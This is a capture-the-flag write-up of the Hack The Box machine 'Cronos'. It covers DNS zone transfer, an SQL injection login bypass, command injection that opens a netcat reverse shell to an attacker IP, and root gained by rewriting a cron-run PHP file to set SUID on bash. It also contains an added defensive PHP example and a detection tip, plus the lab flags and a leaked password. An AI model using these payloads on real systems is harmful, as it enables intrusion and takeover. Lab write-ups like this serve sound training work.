Scanning
sudo nmap -A -T4 -v 10.10.10.13 -oA scans/scan
DNS, SSH, HTTP
Discovered open port 80/tcp on 10.10.10.13
Discovered open port 22/tcp on 10.10.10.13
Discovered open port 53/tcp on 10.10.10.13
DNS is interesting, let's check out HTTP first.
I spent some time enumerating directories before realizing I probably need the hostname for this box. The standard HTB naming convention is <name>.htb, so I added that to my hosts file and was able to access the actual website.
Tried to directory fuzz but did not come up with anything useful
We know DNS is running, let's run dig to see if we can get any subdomains:
dig axfr cronos.htb @10.10.10.13
We got three:
admin.cronos.htb
ns1.cronos.htb
www.cronos.htb
admin.cronos.htb
Tried testing for SQL injection with a single quote; let's see if sqlmap can tell us whether this is a rabbit hole:
sqlmap -r r
sqlmap thinks it's a blind injection:
sqlmap -r r --batch --level 3 --risk 3
Dumped a username and a hash.
Can we crack the hash?
hashcat -m 0 hash /usr/share/wordlists/rockyou.txt
Could not crack the hash 😟
Maybe it's just an auth bypass? We know the username is admin.
I started going down the list here:
Exploitation
This one ended up working!
admin' or '1'='1'#
We are taken to welcome.php
Looks like it's a command execution tool. Makes me think command injection.
Can we just chain commands on the end?
Yup. Reverse shell?
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.25 42069 >/tmp/f
Did not work. I'm gonna try echoing into a file first:
; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.25 42069 >/tmp/f > shell.sh
; chmod +x shell.sh
Confirmed we have execution privileges.
Can we just run it? Not working.
The site is running PHP. Let's just host a PHP shell and wget it.
I was making a logic error before. I should've been chaining the command directly after a valid parameter, not in place of the parameter the command was expecting. The modification is below:
8.8.8.8; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.25 42069 >/tmp/f
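The two weaknesses chained on this box, a login query built by string concatenation and a host parameter handed straight to the shell, are the ones a defender would fix. As an added example that is not the box's own source, here is a hypothetical welcome.php-style handler with each unsafe pattern beside its hardened form (assumes a PDO connection, a users table with a password_hash column, and the tool only ever needing ping or traceroute):

```php
<?php
// Added example (hypothetical, not the Cronos source): unsafe patterns
// beside the hardened equivalents.

// Login: concatenating the username lets admin' or '1'='1'# rewrite the
// WHERE clause, and unsalted MD5 is what hashcat -m 0 attacks offline.
function loginUnsafe(PDO $pdo, string $user, string $pass): bool {
    $sql = "SELECT * FROM users WHERE username='$user' AND password='" . md5($pass) . "'";
    return $pdo->query($sql)->fetch() !== false;
}

// Hardened: bound parameters keep input out of the SQL grammar, and the
// password is checked with password_verify() against a salted bcrypt hash.
function loginSafe(PDO $pdo, string $user, string $pass): bool {
    $stmt = $pdo->prepare('SELECT password_hash FROM users WHERE username = ?');
    $stmt->execute([$user]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row !== false && password_verify($pass, $row['password_hash']);
}

// Network tool: free-form "command" and "host" go straight to the shell,
// so a host of "8.8.8.8; <anything>" runs <anything> as the web user.
function runUnsafe(string $command, string $host): string {
    return (string) shell_exec($command . ' ' . $host);
}

// Hardened: allowlist the binaries, validate the host as an IP or a DNS
// name, and quote it with escapeshellarg() so ';' and '|' are literal.
function runSafe(string $command, string $host): string {
    $allowed = ['ping' => '/bin/ping -c 1', 'traceroute' => '/usr/sbin/traceroute'];
    if (!isset($allowed[$command])) {
        throw new InvalidArgumentException('unknown command');
    }
    $isIp   = filter_var($host, FILTER_VALIDATE_IP) !== false;
    $isName = filter_var($host, FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME) !== false;
    if (!$isIp && !$isName) {
        throw new InvalidArgumentException('invalid host');
    }
    return (string) shell_exec($allowed[$command] . ' ' . escapeshellarg($host));
}
```

On the detection side, the same bug leaves a clear trace: a web-server child process (sh, nc, mkfifo) spawned by php with a parent of the web user is the event to alert on.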
Stabilize our shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'
Privilege Escalation
Checking for easy stuff:
id
sudo -l
find / -perm /4000 2>/dev/null
Nothing of interest in these outputs, except pkexec, which is vulnerable to PwnKit (not the intended path).
Password hunting?
grep -ir passw
Found local database password?
kEjdbRigfBHUREiNSDs
Not allowed to access 😟
cat /etc/crontab
Crontab has something!
Root is running /artisan?
We own the file, so we can modify it to do whatever we want. Let's investigate further.
It's running PHP! We have a few options: we can add a PHP reverse shell here, or we can execute a system command and add the SUID bit to bash.
<?php echo system('sudo chmod +s /bin/bash'); ?>
- I made a backup of the artisan file
cp artisan artisan.bak
- Created my own with echo and added the shebang + our malicious code
echo '#!/usr/bin/env php' > artisan
echo "<?php echo system('sudo chmod +s /bin/bash'); ?>" >> artisan
- Wait for the cronjob to execute…
We got it!
bash -p
ROOT 🙂
Let's grab the flags:
user
70ea15c698c191fa1c14b72397450688
root
5a68fe542a4ebdbf1b1e18e3442065f5